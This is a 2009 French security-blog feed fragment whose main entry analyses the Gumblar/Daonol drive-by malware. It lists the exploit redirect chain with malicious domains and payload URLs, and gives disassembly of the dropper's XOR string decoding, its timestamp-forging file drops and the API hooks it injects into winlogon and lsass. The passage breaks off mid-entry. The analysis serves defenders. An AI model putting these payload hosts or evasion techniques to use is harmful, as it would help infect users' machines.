June 25, 2009 - Jonell Baltazar )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=690&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Dissecting Koobface Worm's Twitter Campaign">Dissecting Koobface Worm's Twitter Campaign</a> ( July 15, 2009 - Dancho Danchev )<br />- <a title="New KOOBFACE Upgrade Makes It Takedown-Proof" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=688&amp;entry_id=45"  onmouseover="window.status='http://blog.trendmicro.com/new-koobface-upgrade-makes-it-takedown-proof/';return true;" onmouseout="window.status='';return true;">New KOOBFACE Upgrade Makes It Takedown-Proof</a> ( July 22, 2009 - Jonell Baltazar )<br />- <a title="Koobface - Come Out, Come Out, Wherever You Are" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=689&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html';return true;" onmouseout="window.status='';return true;">Koobface - Come Out, Come Out, Wherever You Are</a> ( July 22, 2009 - Dancho Danchev )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=691&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Movement on the Koobface Front">Movement on the Koobface Front</a> ( August 4, 2009 - Dancho Danchev )<br />- <a title="The Real Face of KOOBFACE" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=692&amp;entry_id=45"  onmouseover="window.status='http://blog.trendmicro.com/the-real-face-of-koobface/';return true;" onmouseout="window.status='';return true;">The Real Face of KOOBFACE</a> ( August 6, 2009 - Ryan Flores )<br />- <a title="New tricks for Koobface" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=694&amp;entry_id=45"  onmouseover="window.status='http://www.viruslist.com/en/weblog?weblogid=208187803';return true;" onmouseout="window.status='';return true;">New tricks for Koobface</a> ( August 6, 2009 - Stefan )<br />- <a title="Tertwit? or Twitter Tweet Links Redirect to Koobface" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=693&amp;entry_id=45"  onmouseover="window.status='http://blog.threatfire.com/2009/08/terttwit-or-twitter-tweets-links.html';return true;" onmouseout="window.status='';return true;">Tertwit? or Twitter Tweet Links Redirect to Koobface</a> ( August 7, 2009 - ThreatFire )<br /> - <a title="Koobface New Status Update..." target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=699&amp;entry_id=45"  onmouseover="window.status='http://community.ca.com/blogs/securityadvisor/archive/2009/08/14/koobface-new-status-update.aspx';return true;" onmouseout="window.status='';return true;">Koobface New Status Update...</a> ( August 14, 2009 - Mary Grace Gabriel )<br />- <a title="Koobface: The saga continues" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=700&amp;entry_id=45"  onmouseover="window.status='http://pandalabs.pandasecurity.com/archive/Koobface_3A00_-The-saga-continues.aspx';return true;" onmouseout="window.status='';return true;">Koobface: The saga continues</a> ( August 14, 2009 - Sean-Paul Correll )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=703&amp;entry_id=45"  onmouseover="window.status='http://blog.trendmicro.com/koobface-ramps-up-its-twitter-campaign/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface Ramps Up Its Twitter Campaign">Koobface Ramps Up Its Twitter Campaign</a> ( August 17, 2009 - Joey Costoya )<br />- <a title="Movement on the Koobface Front - Part Two" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=701&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html';return true;" onmouseout="window.status='';return true;">Movement on the Koobface Front - Part Two</a> ( August 19, 2009 - Dancho Danchev )<br />- <a title="Koobface 0x3e8 Folders and Links" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=702&amp;entry_id=45"  onmouseover="window.status='http://blog.threatfire.com/2009/08/koobface-continues-to-tweet-its-assault.html';return true;" onmouseout="window.status='';return true;">Koobface 0x3e8 Folders and Links</a> ( August 19, 2009 - ThreatFire )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=779&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Dancho Danchev Koobface Botnet's Scareware Business Model">Koobface Botnet's Scareware Business Model</a> ( September 16, 2009 - Dancho Danchev )<br />- <a title="Les attaques 2.0 : quand les pirates passent à l'action" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=790&amp;entry_id=45"  onmouseover="window.status='http://www.xmcopartners.com/actu-secu/XMCO-ActuSecu-23-Koobface-Gumblar.pdf';return true;" onmouseout="window.status='';return true;">Koobface, Gumblar, Slowloris, Antisec</a> ( September 18, 2009 - ActuSécu XMCO n°23 ) <br />- <a href="http://mad.internetpol.fr/exit.php?url_id=782&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface Botnet Dissected in a TrendMicro Report">Koobface Botnet Dissected in a TrendMicro Report</a> ( October 14, 2009 - Dancho Danchev )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=789&amp;entry_id=45"  onmouseover="window.status='http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface Botnet's Scareware Business Model - Part Two">Koobface Botnet's Scareware Business Model - Part Two</a> ( November 11, 2009 - Dancho Danchev )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=840&amp;entry_id=45"  onmouseover="window.status='http://www.abuse.ch/?p=2103';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface – the social network trojan">Koobface – the social network trojan</a> ( December 6, 2009 - The Swiss Security Blog )<br /><br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/44-Daonol-Gumblar-Miekiemoes-is-a-superstar.html" rel="alternate" title="Daonol / Gumblar - Miekiemoes is a superstar" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-05-11T16:31:00Z</published>
        <updated>2009-11-14T07:39:53Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=44</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=44</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/44-guid.html</id>
        <title type="html">Daonol / Gumblar - Miekiemoes is a superstar</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>You know what? I'm happy...<br /></p> 
<p><img alt="MISC 43" src="http://mad.internetpol.fr/imgupz/misc43cover.jpg" /></p> 
<ul> 
<li>[05 - 10] Les Web Services</li> 
<li>[11 - 18] Pentest d’un Web Service</li> 
<li>[20 - 31] WS-Security</li> 
<li>
[32 - 37] Attaques sur les Web Services</li> 
<li>
[38 - 43] Vers une version française de la guerre de l’information ? (Partie 2)</li> 
<li>
[44 - 53] Aperçu de l’infrastructure BGP</li> 
<li>
[54 - 60] Détection opérationnelle des rootkits HVM ou quand la recherche remplace le buzz (Partie 2)</li> 
<li>
[61 - 71] Fuzzing 802.11</li> 
<li>
Exploitation de la faiblesse de MD5 : création d’une autorité de certification</li> 
<li>[78 - 82] La sécurité du WiFi sur la sellette
</li> 
</ul> 
<p>Pour plus d'infos, rendez-vous chez <a href="http://mad.internetpol.fr/exit.php?url_id=547&amp;entry_id=44"  onmouseover="window.status='http://www.ed-diamond.com/';return true;" onmouseout="window.status='';return true;" target="_blank" title="MISC - Editions Diamond">Diamond</a>.</p> 
<p> <strong>Daonol</strong> ça vous dit quelque chose ? Non, ce n'est pas une marque de boisson qui permet de diminuer le cholestérol, il est écrit: &quot;<strong>DAONOL</strong>&quot;. Non toujours pas ? Et bien c'est parfait puisque c'est le thème de ce billet. Une banale discussion entre collaborateurs lors d'un repas peut vous entraîner dans des histoires farfelues, en voici la preuve.</p> <p>&#160;Arrivés au moment du café, comme tout à chacun, on apprécie
s'échanger les petits détails croustillants et les ragots qui se
déroulent sous nos cyber-yeux. L'un d'eux m'explique avoir lu récemment
par le biais du très controversé Zataz que des pirates avaient décidés
de s'acharner sur les visiteurs de sites ayant des liens avec le club
du <a title="PSG" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=548&amp;entry_id=44"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Paris_Saint-Germain_Football_Club';return true;" onmouseout="window.status='';return true;">Paris Saint-Germain</a> en injectant des codes malveillants dans les pages. Ces choses sont si banales que sur
le moment, je n'y prête pas plus attention. Allez savoir si c'est la
curiosité ou la <em>(l'in)</em>
conscience professionnelle, je décide une fois de retour à
mon bureau de consulter ces articles pour en apprendre d'avantage sur
le type de menaces qui touchent ces sites. Deux articles pour le mois
de mai, le plus ancien fait référence à &quot;psgteam.net&quot; et l'autre à
&quot;pronopsg.com&quot; ; l'un est un portail &quot;Joomla!&quot; qui a été &quot;nettoyé&quot;
l'autre est une simple page encore piégée. Allons voir de plus près ce
qu'il se passe lorsqu'un internaute affiche ces pages. <font face="tahoma,arial,helvetica,sans-serif"><span style="color: #ff0000;">N'essayez pas de visiter ces sites, même
si vous pensez être en sécurité et savoir ce que vous faites, vous
risqueriez de vous infecter.  </span></font></p> 
<p>Premier indice, la date de modification de la page &quot;<font face="arial,helvetica,sans-serif">Sun, 10 May 2009 09:02:06 GMT</font>&quot; (<em>au moment d'écrire l'article</em>);</p> 
<p><img alt="HeaderEvilScript" src="http://mad.internetpol.fr/imgupz/evil_script.gif" /><br /> </p> 
<p>Ce script contient une légère obfuscation, les connaisseurs devraient arriver à lire ce message sans trop de complications.</p> 
<p><img alt="DecodeEvilJs" src="http://mad.internetpol.fr/imgupz/eviljs.gif" /></p> 
<p>Sur le moment, je suis étonné par le nom pas commun du cookie: &quot;<em>miek</em>&quot; mais après tout pourquoi pas. En bas de page:<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/psgprono_frame.gif" alt="Evil iFrames" /></p> 
<p>Le nom de domaine &quot;<strong>gumblar.cn</strong>&quot; est connus de nos services depuis un moment. Dernièrement, j'ai lu un article à ce sujet sur le blog &quot;<a href="http://mad.internetpol.fr/exit.php?url_id=549&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Unmask Parasites">Unmask Parasites</a>&quot;. Au moment de l'article, le site &quot;klaomta.com&quot; ne répondait pas, en outre toujours sur le même <a href="http://mad.internetpol.fr/exit.php?url_id=550&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Another Type of iframe Hack PHP Exploit">blog</a>,
on découvre d'autres informations sur le type de code injecté. Pour
&quot;liteautotop.cn&quot;, pas question d'analyser tous les exploits, ça
prendrait trop de temps à rédiger, ci-dessous un schéma simplifié.<br /></p> 
<p><font face="verdana,arial,helvetica,sans-serif">- 91.212.65.144 - http://liteautotop.cn/ts/in.cgi?mozila<br /> &#160; -&gt; 91.212.65.144 - http://liteautotop.cn/index.php<br />&#160;&#160;&#160; -&gt; 213.182.197.23 - http://litebest.cn:8080/index.php</font><font face="verdana,arial,helvetica,sans-serif"><br />&#160;&#160;&#160; -&gt; 85.214.90.254 - http://bigtopcabaret.cn:8080/index.php<br /></font><font face="verdana,arial,helvetica,sans-serif">&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 213.182.197.23 - http://findbigthinker.cn:8080/cache/flash.swf<br />&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 213.182.197.23 - http://litebest.cn:8080/cache/flash.swf</font><font face="verdana,arial,helvetica,sans-serif"><br />&#160;&#160;&#160;&#160;&#160;&#160;&#160; -&gt; </font><font face="verdana,arial,helvetica,sans-serif">85.214.90.254</font><font face="verdana,arial,helvetica,sans-serif"> - http://</font><font face="verdana,arial,helvetica,sans-serif">bigtopcabaret</font><font face="verdana,arial,helvetica,sans-serif">.cn:8080/cache/flash.swf<br /></font><font face="verdana,arial,helvetica,sans-serif">&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 91.212.65.144 - http://liteautotop.cn/cache/flash.swf<br />&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 213.182.197.23 - http://findbigthinker.cn:8080/cache/readme.pdf<br />&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 213.182.197.23 - http://litebest.cn:8080/cache/readme.pdf</font><font face="verdana,arial,helvetica,sans-serif"><br /> &#160;&#160; &#160;&#160;&#160;&#160; -&gt; </font><font face="verdana,arial,helvetica,sans-serif">85.214.90.254</font><font face="verdana,arial,helvetica,sans-serif"> - http://bigtopcabaret.cn:8080/cache/readme.pdf<br /></font><font face="verdana,arial,helvetica,sans-serif">&#160;&#160;&#160; &#160;&#160;&#160; -&gt; 91.212.65.144 - http://liteautotop.cn/cache/readme.pdf<br /><span style="color: #ff0000;">payload</span> -&gt; 213.182.197.23 - http://parkinglotbet.cn/load.php?id=8<br /><span style="color: #ff0000;">payload</span> -&gt; 91.212.65.144 - http://liteautotop.cn/load.php?id=8<br /><span style="color: #ff0000;">payload</span> -&gt; 91.212.65.144 - http://autobestwestern.cn/load.php?id=8<br /><span style="color: #ff0000;">payload</span> -&gt; 91.212.65.144 - http://findbigthinker.cn/load.php?id=8<br /></font><font face="verdana,arial,helvetica,sans-serif"><span style="color: #ff0000;">payload</span> -&gt; </font><font face="verdana,arial,helvetica,sans-serif">85.214.90.254</font><font face="verdana,arial,helvetica,sans-serif"> - http://bigtopcabaret.cn/load.php?id=8</font></p> 
<p>Il s'agit de Trojan:Win32/Gearclop.gen!A ; il en sera sujet dans un avenir proche.</p> 
<p>Revenons aux activités de &quot;<strong>gumblar.cn</strong>&quot;:</p> 
<p><img src="http://mad.internetpol.fr/imgupz/evilbis.gif" /></p> 
<p>Lorsque l'id est à 2, la requête pointe sur un exploit au format PDF.</p> 
<p> <div class="bb-code-title">PDF</div><div class="bb-quote">Server: Apache/2.2.3 (CentOS)<br />X-Powered-By: PHP/5.1.6<br />Expires: Thu, 01 Jan 2000 00:00:00 GMT<br />Cache-Control: must-revalidate, post-check=0, pre-check=0&#160;&#160;&#160; <br />Content-Length: 12791<br />Content-Disposition: inline; filename=CtdP.pdf<br />Content-Transfer-Encoding: binary<br />Connection: close<br />Content-Type: application/pdf</div></p> 
<p>Lorsque l'id est à 3, la requête pointe sur un exploit au format SWF. <br /></p> 
<p><div class="bb-code-title">SWF</div><div class="bb-quote">Server: Apache/2.2.3 (CentOS)<br />X-Powered-By: PHP/5.1.6<br />Expires: Thu, 01 Jan 2000 00:00:00 GMT<br />Cache-Control: must-revalidate, post-check=0, pre-check=0<br />Content-Length: 12858<br />Content-Disposition: inline; filename=Bi9ZmG.swf<br />Content-Transfer-Encoding:binary<br />Connection: close<br />Content-Type: application/x-shockwave-flash</div></p> 
<p>L'id 11 correspond à un programme compressé <a title="UPX" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=551&amp;entry_id=44"  onmouseover="window.status='http://upx.sourceforge.net/';return true;" onmouseout="window.status='';return true;">UPX</a>.</p> <div class="bb-code-title">EXE</div><div class="bb-quote">Server: Apache/2.2.3 (CentOS)<br />X-Powered-By: PHP/5.1.6<br />Expires: Thu, 01 Jan 2000 00:00:00 GMT&#160;&#160; &#160;<br />Cache-Control: must-revalidate, post-check=0, pre-check=0<br />Content-Length: 17408<br />Content-Disposition: inline; filename=rANd.exe<br />Content-Transfer-Encoding:binary<br />Connection: close<br />Content-Type: application/octet-stream</div> 
























































































<p>Il est important de noter que le nom des fichiers PDF, SWF, EXE sont
générés à la volée. Pour en revenir à l'importance du cookie, il est
théoriquement pas possible de télécharger ces fichiers hors contexte
des exploits.<div class="bb-code-title">CODE:</div><div class="bb-code">//&#160;No&#160;news...&#60;span&#160;class="tag"&#62;&#60;script&#62;&#60;/span&#62;&#60;span&#160;class="script"&#62;
var&#160;t=new&#160;Date&#40;&#41;;document.cookie=&#34;miek=1;&#160;expires=&#34;+t.toGMTString&#40;&#41;+&#34;;&#160;path=/&#34;;
//&#60;/span&#62;&#60;/script&#62;</div></p><span class="tag"></span> 
<p> Décompression de l'exécutable.<br /></p> 
<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160; File size&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; Ratio&#160;&#160;&#160;&#160;&#160; Format&#160;&#160;&#160;&#160;&#160; Name<br />&#160;&#160; --------------------&#160;&#160; ------&#160;&#160; -----------&#160;&#160; -----------<br />&#160;&#160;&#160;&#160; 32768 &lt;-&#160;&#160;&#160;&#160; 17408&#160;&#160; 53.13%&#160;&#160;&#160; win32/pe&#160;&#160;&#160;&#160; rANd.exe<br /><br />Le programme semble alors avoir été compilé en Delphi.<br />Certaines chaînes de caractères sont encodées comme ceci.<br /><br /><font size="1" face="verdana,arial,helvetica,sans-serif">@StrDec:<br />&#160; MOV CL,BYTE PTR DS:[EDX+EAX-1]<br />&#160; XOR CL,<strong><span style="color: #785e2b;">0D5</span></strong><br />&#160; MOV BYTE PTR DS:[EDX+EAX-1],CL<br />&#160; DEC EDX<br />&#160; JNZ @StrDec<br />&#160; RET</font><br /><br />---- Chaînes décryptées<br />&quot;SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32&quot;<br />&quot;\sysaudio.sys&quot;<br />&quot;\wdmaud.sys&quot;<br />&quot;\kernel32.dll&quot;<br />&quot;GetSystemDirectoryA&quot;<br />&quot;\sqlsodbc.chm&quot;<br />etc...<br /><br />La variable nommée %repdrop% correspondra à l'emplacement où le dropper a été exécuté.<br />Une librarie cryptée qu'on va nommer &quot;%alea%.ext&quot; est embarquée dans le dropper.<br /><br /><font size="1" face="verdana,arial,helvetica,sans-serif">&#160; PUSHAD<br />&#160; MOV ESI,00403168<br />&#160; MOV EDI,ESI<br />&#160; ADD EDI,1153<br />@PEDec:<br />&#160; LODS BYTE PTR DS:[ESI]<br />&#160; MOV AH,BYTE PTR DS:[EDI]<br />&#160; XOR EAX,<strong style="color: #785e2b;">0D5D5</strong><br />&#160; MOV BYTE PTR DS:[ESI-1],AH<br />&#160; STOS BYTE PTR ES:[EDI]<br />&#160; SUB EDI,2<br />&#160; CMP ESI,EDI<br />&#160; JLE @PEDec<br />&#160; POPAD</font></p> 
<p align="left">L'empreinte &quot;%alea%.ext&quot; est rendue aléatoire par modification des ressources: (<em>StringFileInfo-&gt;Description</em>)</p> 
<p><font size="1" face="verdana,arial,helvetica,sans-serif">@ScanRes:<br />&#160; MOV EAX,19<br />&#160; CALL @ModSig<br />&#160; ADD EAX,61<br />&#160; MOV BYTE PTR DS:[EBX],AL<br />&#160; INC EBX<br />&#160; DEC ESI<br />&#160; CMP ESI,-1<br />&#160; JNZ @ScanRes<br /><br />@ModSig:<br />&#160; PUSH EBX<br />&#160; XOR EBX,EBX<br />&#160; IMUL EDX,DWORD PTR DS:[EBX+403008],8088405<br />&#160; INC EDX<br />&#160; MOV DWORD PTR DS:[EBX+403008],EDX<br />&#160; MUL EDX<br />&#160; MOV EAX,EDX<br />&#160; POP EBX<br />&#160; RET</font></p> 
<p>Le fichier &quot;sqlsodbc.chm&quot; a un rôle important, il est créé comme ceci:<br /></p> 
<p><font size="1" face="verdana,arial,helvetica,sans-serif">CreateFileA(&quot;%windir%\system32\sqlsodbc.chm&quot;, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);<br />ReadFile(hFile, Buffer, 52B, pBytesRead, NULL);<br />CloseHandle(hFile);</font></p> 
<p>Puis les valeurs renvoyées par l'API <a href="http://mad.internetpol.fr/exit.php?url_id=557&amp;entry_id=44" title="http://msdn.microsoft.com/en-us/library/ms724320%28VS.85%29.aspx"  onmouseover="window.status='http://msdn.microsoft.com/en-us/library/ms724320%28VS.85%29.aspx';return true;" onmouseout="window.status='';return true;" target="_blank">GetFileTime</a> sur le fichier &quot;kernel32.dll&quot; sont récupérées et fait ceci:<br /><font size="1" face="verdana,arial,helvetica,sans-serif">CreateFileA(&quot;%windir%\system32\sqlsodbc.chm&quot;, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NORMAL, NULL);</font><br />Va suivre un WriteFile d'une taille de 0x52B ; puis <a href="http://mad.internetpol.fr/exit.php?url_id=558&amp;entry_id=44" title="http://msdn.microsoft.com/en-us/library/ms724933%28VS.85%29.aspx"  onmouseover="window.status='http://msdn.microsoft.com/en-us/library/ms724933%28VS.85%29.aspx';return true;" onmouseout="window.status='';return true;" target="_blank">SetFileTime</a> et CloseHandle.</p> <font size="2">Même chose, pour &quot;%windir%\system32\wdmaud.sys&quot; ; &quot;%windir%\system32\sysaudio.sys&quot; et la librairie décryptée:</font><br /><font size="1" face="verdana,arial,helvetica,sans-serif">CreateFileA(&quot;%repdrop%\..\%alea%.ext&quot;, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NORMAL, NULL);</font><br />Va suivre un WriteFile d'une taille de 0x5A00 puis <a href="http://mad.internetpol.fr/exit.php?url_id=558&amp;entry_id=44" title="http://msdn.microsoft.com/en-us/library/ms724933%28VS.85%29.aspx"  onmouseover="window.status='http://msdn.microsoft.com/en-us/library/ms724933%28VS.85%29.aspx';return true;" onmouseout="window.status='';return true;" target="_blank">SetFileTime</a> et CloseHandle. 


  











































































<p>Pas besoins de clarifier, je pense que vous avez compris le but des
manipulations. Un fichier batch est ensuite créé à la racine, il sera
chargé d'effacer le dropper. Une fois le système infecté, aucun
processus ne semble actif ou visible et pourtant... en mémoire ça
s'active ! En principe, quand un programme est exécuté, il charge des
modules sauf qu'au lieu d'avoir des légitimes, on a ceci:<br /><br /><font face="verdana,arial,helvetica,sans-serif">LoadLibraryExW(&quot;%repdrop%\..\%alea%.ext&quot;, NULL, 0);</font><br />Viendra ensuite un <font face="verdana,arial,helvetica,sans-serif">VirtualAlloc(10000000,C001,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);</font><br />Puis un <font face="verdana,arial,helvetica,sans-serif">CreateThread(NULL, 0, 1000BFF9, 1000BFED, 0, 0012E5B0);</font><br />Le flag 0 signifie que ce thread va être exécuté après sa création, un coups d'oeil..</p> 
<p>----------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><font size="1" face="tahoma,arial,helvetica,sans-serif">1000BFF9&#160;&#160;&#160; 59&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; POP ECX<br />1000BFFA&#160;&#160;&#160; 5E&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; POP ESI&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ; 1000BFED<br />1000BFFB&#160;&#160;&#160; AD&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; LODS DWORD PTR DS:[ESI]<br />1000BFFC&#160;&#160;&#160; 50&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; PUSH EAX&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ; 0000C000<br />1000BFFD&#160;&#160;&#160; 6A 01&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; PUSH 1<br />1000BFFF&#160;&#160;&#160; AD&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; LODS DWORD PTR DS:[ESI]<br />1000C000&#160;&#160;&#160; 50&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; PUSH EAX&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ; &quot;%repdrop%\..\%alea%.ext&quot;<br />1000C001&#160;&#160;&#160; 51&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; PUSH ECX<br />1000C002&#160;&#160;&#160; FF26&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; JMP DWORD PTR DS:[ESI]&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ; DS:[1000BFF5]=10005BAC \o/<br />1000C004&#160;&#160;&#160; 59&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; POP ECX</font><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------</p> 
<p> </p> 
<p>Voici maintenant l'extrait d'une capture d'API alors que l'utilisateur ne fait absolument rien.<br /><font face="verdana,arial,helvetica,sans-serif">&#160;- svchost.exe - pid:1840 - OUVRE - &quot;%repdrop%\..\%alea%.ext&quot; - crc32:0x074B8027<br />&#160;- svchost.exe - pid:1840 - FERME - &quot;%repdrop%\..\%alea%.ext&quot; - crc32:0x074B8027<br />&#160;- svchost.exe - pid:1840 - OUVRE - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1<br />&#160;- svchost.exe - pid:1840 - LECTURE - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1<br />&#160;- svchost.exe - pid:1840 - FERME - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1</font><font face="verdana,arial,helvetica,sans-serif"><br /></font><br />Ci-dessous, l'utilisateur vient d'effacer les fichiers, mais rien n'y fait, ça continue.<br /><font face="verdana,arial,helvetica,sans-serif">&#160;- svchost.exe - pid:1840 - OUVRE - &quot;%repdrop%\..\%alea%.ext&quot; - crc32:0x074B8027<br />&#160;- svchost.exe - pid:1840 - FERME - &quot;%repdrop%\..\%alea%.ext&quot; - crc32:0x074B8027<br />&#160;- svchost.exe - pid:1840 - OUVRE - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1<br />&#160;- svchost.exe - pid:1840 - LECTURE - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1<br />&#160;- svchost.exe - pid:1840 - FERME - &quot;%windir%\system32\sqlsodbc.chm - crc32:0x726891F1</font><br /><br />Les
processus injectés vont, toutes les 5 secondes, effectuer des
vérifications. Si des fichiers ont été effacés, ils sont recréés à
l'identique. Ce balayage devrait en théorie alerter les utilisateurs
car les ressources viennent rapidement à diminuer sans compter que ça
s'applique à d'autres fonctions que la simple surveillance des
fichiers, regardez plutôt ceci.</p> 
<p>---- User code sections - GMER ----<br /><font face="verdana,arial,helvetica,sans-serif">.text&#160; %windir%\system32\winlogon.exe kernel32.dll!CreateProcessW&#160; 7C802332 5 Bytes&#160; JMP 10003B10 <br />.text&#160; %windir%\system32\winlogon.exe WS2_32.dll!connect&#160; 719F406A 5 Bytes&#160; JMP 10003A3C <br />.text&#160; %windir%\system32\winlogon.exe WS2_32.dll!send&#160;&#160;&#160;&#160; 719F428A 5 Bytes&#160; JMP 100031A0 <br />.text&#160; %windir%\system32\winlogon.exe WS2_32.dll!WSARecv&#160; 719F4318 5 Bytes&#160; JMP 100028C0 <br />.text&#160; %windir%\system32\winlogon.exe WS2_32.dll!recv&#160;&#160;&#160;&#160; 719F615A 5 Bytes&#160; JMP 10002838 <br />.text&#160; %windir%\system32\winlogon.exe WS2_32.dll!WSASend&#160; 719F6233 5 Bytes&#160; JMP 10003A04 <br /><br />.text&#160; %windir%\system32\lsass.exe kernel32.dll!CreateProcessW&#160;&#160;&#160;&#160; 7C802332 5 Bytes&#160; JMP 10003B10 <br />.text&#160; %windir%\system32\lsass.exe WS2_32.dll!connect&#160;&#160;&#160;&#160; 719F406A 5 Bytes&#160; JMP 10003A3C <br />.text&#160; %windir%\system32\lsass.exe WS2_32.dll!send&#160;&#160;&#160;&#160;&#160;&#160;&#160; 719F428A 5 Bytes&#160; JMP 100031A0 <br />.text&#160; %windir%\system32\lsass.exe 